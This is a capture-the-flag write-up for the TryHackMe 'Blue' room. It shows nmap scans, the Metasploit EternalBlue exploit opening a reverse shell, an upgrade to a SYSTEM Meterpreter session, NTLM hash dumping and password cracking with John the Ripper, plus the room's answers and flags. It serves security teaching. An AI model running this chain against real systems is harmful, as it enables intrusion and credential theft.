Deploy & hack into a Windows machine, leveraging common misconfiguration issues.
Room: https://tryhackme.com/room/blue
Requirements #
Everything is ready to use on Kali or the THM AttackBox:
- RustScan / nmap
- Metasploit
- John the Ripper “jumbo”
Setup #
- start Windows machine
- start Attackbox
- log in to the AttackBox, open a terminal and, based on the THM Target Machine Information, set the machine IP address:
export IP=10.10.59.0
Task 1: Recon #
Based on the THM question we could scan only the ports under 1000 using `--range 1-1000` or `--top`, but let's run it across all ports.
rustscan -a $IP
(...)
PORT STATE SERVICE REASON
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack
3389/tcp open ms-wbt-server syn-ack
49152/tcp open unknown syn-ack
49153/tcp open unknown syn-ack
49154/tcp open unknown syn-ack
49158/tcp open unknown syn-ack
49159/tcp open unknown syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.05 seconds
Question: How many ports are open with a port number under 1000?
Answer: Three open ports meet the condition: 135, 139 and 445
Based on that, let's run a more detailed scan of only those three ports:
nmap -sV -sC --script vuln -oN blue_nmap -p135,139,445 $IP
- `-sV` determines the software version
- `-sC` runs the default nmap scripts, which help with enumeration and vulnerability detection
- `-oN blue_nmap` writes the results to a file
- `--script vuln` runs scripts that look for known security weaknesses
(...)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 02:A6:87:17:FF:49 (Unknown)
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
(...)
Question: What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)
Answer: ms17-010
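As an added example (not part of the original write-up), here is a small parser for the scan text above that answers both recon questions from the output itself: it counts the open ports below 1000 and pulls the reported state and CVE ids out of the NSE vuln-script block. The `SCAN_OUTPUT` string is an excerpt of the rustscan/nmap output shown above, embedded as sample input; the function names are my own.

```python
"""Parse the rustscan/nmap text output shown in the write-up.

Answers the two recon questions from the scan text:
  * how many open ports have a number under 1000, and
  * which NSE vuln scripts reported a VULNERABLE state (and for which CVEs).
"""
import re

# Sample input: an excerpt of the scan output shown in the write-up above.
SCAN_OUTPUT = """\
PORT STATE SERVICE REASON
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack
3389/tcp open ms-wbt-server syn-ack
49152/tcp open unknown syn-ack
49153/tcp open unknown syn-ack
49154/tcp open unknown syn-ack
49158/tcp open unknown syn-ack
49159/tcp open unknown syn-ack
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
"""

# "445/tcp open microsoft-ds syn-ack" -> port, proto, state, service
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)", re.M)
# An NSE script header is a lowercase script name followed by ':'; the
# negative lookahead keeps "https://..." reference lines from matching.
SCRIPT_HEADER = re.compile(r"^([a-z][a-z0-9-]*):(?!//)\s*(.*)$")
CVE_ID = re.compile(r"CVE-\d{4}-\d{4,}")


def parse_open_ports(text):
    """Return [(port, proto, service), ...] for every port line in 'open' state."""
    return [(int(port), proto, svc)
            for port, proto, state, svc in PORT_LINE.findall(text)
            if state == "open"]


def count_ports_below(text, limit=1000):
    """Count open ports whose number is below `limit` (the room asks for < 1000)."""
    return sum(1 for port, _, _ in parse_open_ports(text) if port < limit)


def parse_vuln_scripts(text):
    """Return {script_name: {"state": ..., "cves": [...]}} from NSE output.

    Handles both the one-line form ('|_smb-vuln-ms10-054: false') and the
    multi-line form where 'State:' and 'IDs:' appear on later lines.
    """
    findings, current = {}, None
    for raw in text.splitlines():
        if not raw.startswith("|"):
            continue                      # not part of a script block
        line = raw.lstrip("|_ ").strip()  # drop the '| ' / '|_' tree prefix
        header = SCRIPT_HEADER.match(line)
        if header:
            current = header.group(1)
            findings[current] = {"state": header.group(2) or None, "cves": []}
            continue
        if current is None:
            continue
        if line.startswith("State:"):
            findings[current]["state"] = line.split(":", 1)[1].strip()
        elif line.startswith("IDs:"):
            findings[current]["cves"].extend(CVE_ID.findall(line))
    return findings


def vulnerable_scripts(text):
    """Names of scripts whose reported state is VULNERABLE, mapped to their CVEs."""
    return {name: info["cves"] for name, info in parse_vuln_scripts(text).items()
            if info["state"] == "VULNERABLE"}


if __name__ == "__main__":
    print("open ports under 1000:", count_ports_below(SCAN_OUTPUT))
    print("vulnerable:", vulnerable_scripts(SCAN_OUTPUT))
```

The same parsing is what a vulnerability-management job would do with the saved `-oN` output: a VULNERABLE result from `smb-vuln-ms17-010` on a host is the signal to apply MS17-010 and disable SMBv1, and to ask whether 445/tcp needs to be reachable from the scanning network at all.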
Task 2: Gain Access #
Run Metasploit with the `msfconsole` command and let's search for the exploit we discovered.
msf6 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 \_ target: Automatic Target . . . .
2 \_ target: Windows 7 . . . .
3 \_ target: Windows Embedded Standard 7 . . . .
4 \_ target: Windows Server 2008 R2 . . . .
5 \_ target: Windows 8 . . . .
6 \_ target: Windows 8.1 . . . .
7 \_ target: Windows Server 2012 . . . .
8 \_ target: Windows 10 Pro . . . .
9 \_ target: Windows 10 Enterprise Evaluation . . . .
10 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
11 \_ target: Automatic . . . .
12 \_ target: PowerShell . . . .
13 \_ target: Native upload . . . .
14 \_ target: MOF upload . . . .
15 \_ AKA: ETERNALSYNERGY . . . .
16 \_ AKA: ETERNALROMANCE . . . .
17 \_ AKA: ETERNALCHAMPION . . . .
18 \_ AKA: ETERNALBLUE . . . .
19 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
20 \_ AKA: ETERNALSYNERGY . . . .
21 \_ AKA: ETERNALROMANCE . . . .
22 \_ AKA: ETERNALCHAMPION . . . .
23 \_ AKA: ETERNALBLUE . . . .
24 auxiliary/scanner/smb/smb_ms17_010 . normal No MS17-010 SMB RCE Detection
25 \_ AKA: DOUBLEPULSAR . . . .
26 \_ AKA: ETERNALBLUE . . . .
27 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
28 \_ target: Execute payload (x64) . . . .
29 \_ target: Neutralize implant . . . .
Interact with a module by name or index. For example info 29, use 29 or use exploit/windows/smb/smb_doublepulsar_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant'
Let's go with the first item from the results: `use exploit/windows/smb/ms17_010_eternalblue` or `use 0`.
Question: Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)
Answer: exploit/windows/smb/ms17_010_eternalblue
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.c
om/docs/using-metasploit/basics/using-metasploit.
html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authenti
cation. Only affects Windows Server 2008 R2, Wind
ows 7, Windows Embedded Standard 7 target machine
s.
SMBPass no (Optional) The password for the specified usernam
e
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Targ
et. Only affects Windows Server 2008 R2, Windows
7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only a
ffects Windows Server 2008 R2, Windows 7, Windows
Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, no
ne)
LHOST 10.10.54.158 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
It looks like we only need to provide `RHOSTS`, the IP address of the target machine we want to run the exploit against.
Question: Show options and set the one required value. What is the name of this value? (All caps for submission)
Answer: RHOSTS
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.59.0
RHOSTS => 10.10.59.0
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/shell/reverse_tcp
payload => windows/x64/shell/reverse_tcp
Usually it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter:
set payload windows/x64/shell/reverse_tcp
Let's run the exploit and wait for the results…
I had to restart the target machine, so the IP address changed from that point to 10.10.183.48.
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.10.54.158:4444
[*] 10.10.183.48:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.183.48:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.183.48:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.183.48:445 - The target is vulnerable.
[*] 10.10.183.48:445 - Connecting to target for exploitation.
[+] 10.10.183.48:445 - Connection established for exploitation.
[+] 10.10.183.48:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.183.48:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.183.48:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.183.48:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.183.48:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.183.48:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.183.48:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.183.48:445 - Sending all but last fragment of exploit packet
[*] 10.10.183.48:445 - Starting non-paged pool grooming
[+] 10.10.183.48:445 - Sending SMBv2 buffers
[+] 10.10.183.48:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.183.48:445 - Sending final SMBv2 buffers.
[*] 10.10.183.48:445 - Sending last fragment of exploit packet!
[*] 10.10.183.48:445 - Receiving response from exploit packet
[+] 10.10.183.48:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.183.48:445 - Sending egg to corrupted connection.
[*] 10.10.183.48:445 - Triggering free of corrupted buffer.
[*] Sending stage (336 bytes) to 10.10.183.48
[*] Command shell session 1 opened (10.10.54.158:4444 -> 10.10.183.48:49191) at 2025-04-04 16:01:52 +0100
[+] 10.10.183.48:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.183.48:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.183.48:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Shell Banner:
Microsoft Windows [Version 6.1.7601]
-----
C:\Windows\system32>
Task 3: Escalate #
Question: If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)
Answer: post/multi/manage/shell_to_meterpreter
C:\Windows\system32>^Z
Background session 1? [y/N] y
msf6 exploit(windows/smb/ms17_010_eternalblue) >
msf6 exploit(windows/smb/ms17_010_eternalblue) > search shell_to_meterpreter
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/manage/shell_to_meterpreter . normal No Shell to Meterpreter Upgrade
(...)
msf6 exploit(windows/smb/ms17_010_eternalblue) > use 0
msf6 post(multi/manage/shell_to_meterpreter) > options
Module options (post/multi/manage/shell_to_meterpreter):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER true yes Start an exploit/multi/handler to receive the connectio
n
LHOST no IP of host that will receive the connection from the pa
yload (Will try to auto detect).
LPORT 4433 yes Port for payload to connect to.
SESSION yes The session to run this module on
(...)
Above, when we backgrounded the shell, it was kept as session 1, so here we set SESSION to 1.
msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.10.54.158:4433
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) >
[*] Sending stage (203846 bytes) to 10.10.183.48
[*] Meterpreter session 2 opened (10.10.54.158:4433 -> 10.10.183.48:49208) at 2025-04-04 16:13:33 +0100
[*] Stopping exploit/multi/handler
Question: Select this (use MODULE_PATH). Show options, what option are we required to change?
Answer: SESSION
We can see that meterpreter session 2 has been created.
msf6 post(multi/manage/shell_to_meterpreter) > sessions -i
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Shell Banner: Microsoft Win 10.10.54.158:4444 -> 10.10.1
dows [Version 6.1.7601] --- 83.48:49191 (10.10.183.48)
--
2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ JON-P 10.10.54.158:4433 -> 10.10.1
C 83.48:49208 (10.10.183.48)
msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...
meterpreter >
Let's jump into our newly created session using `sessions -i 2`.
Task 4: Cracking #
Dump the non-default user’s password and crack it!
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
Question: Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
Answer: Jon
Copy the last line from the hashdump output and save it to a text file on the AttackBox. In a moment we'll use it to crack the password hash.
root@ip-10-10-54-158:~# echo "Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::" > jon_hash.txt
I believe the author wanted us to use John the Ripper, so let's go with that tool.
root@ip-10-10-54-158:~# john --format=NT jon_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
alqfna22 (Jon)
1g 0:00:00:01 DONE (2025-04-04 16:36) 0.7246g/s 7391Kp/s 7391Kc/s 7391KC/s alr1979..alpus
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.
Question: Copy this password hash to a file and research how to crack it. What is the cracked password?
Answer: alqfna22
Task 5: Find flags! #
Find the three flags planted on this machine. These are not traditional flags, rather, they’re meant to represent key locations within the Windows system. Use the hints provided below to complete this room!
On this last task I forgot to extend the run time of my machine, so I lost progress on this step. I will share the flags that I had discovered and saved earlier, without further details.
Question: Find the three flags planted on this machine. These are not traditional flags, rather, they’re meant to represent key locations within the Windows system. Use the hints provided below to complete this room!
Answer: flag{access_the_machine}
Question: Flag2? This flag can be found at the location where passwords are stored within Windows.
Answer: flag{sam_database_elevated_access}
Question: flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.
Answer: flag{admin_documents_can_be_valuable}
Congratz! 😄 🤖